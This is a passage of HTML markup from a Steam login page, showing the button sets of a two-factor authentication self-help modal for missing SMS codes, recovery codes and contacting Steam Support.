              <div class="auth_button_h5">I'm not receiving the text message</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_incorrectcode" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_nosms">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I'm not receiving the text message</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_removed" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
              <div class="auth_button_h3">Log in</div>
              <div class="auth_button_h5">with the mobile authenticator removed</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_replaced" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
              <div class="auth_button_h3">Log in</div>
              <div class="auth_button_h5">to the Steam Mobile app</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_nosms" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode">
              <div class="auth_button_h3">Yes</div>
              <div class="auth_button_h5">I have the recovery code that begins with 'R'</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
              <div class="auth_button_h3">No</div>
              <div class="auth_button_h5">I don't have a code like that</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">my recovery code</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode" style="display: none;">
            <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
              <div class="auth_button_h3">Submit</div>
              <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
            </div>
            <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
            <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
              <div class="auth_button_h3">Please help</div>
              <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
            </div>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_couldnthelp" style="display: none;">
            <a class="auth_button leftbtn" href="https://help.steampowered.com/">
              <div class="auth_button_h3">Contact us</div>
              <div class="auth_button_h5">for help with account access</div>
            </a>
          </div>
          <div class="auth_buttonset" id="login_twofactorauth_buttonset_waiting" style="display: none;">
          </div>
        </div>
        <div style="display: none;">
          <input type="submit">
        </div>
      </form>
    </div>
  </div>
</body>

</html>
